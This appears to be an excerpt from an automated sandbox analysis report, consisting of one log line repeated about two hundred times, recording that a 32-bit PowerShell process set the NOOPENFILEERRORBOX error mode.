                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
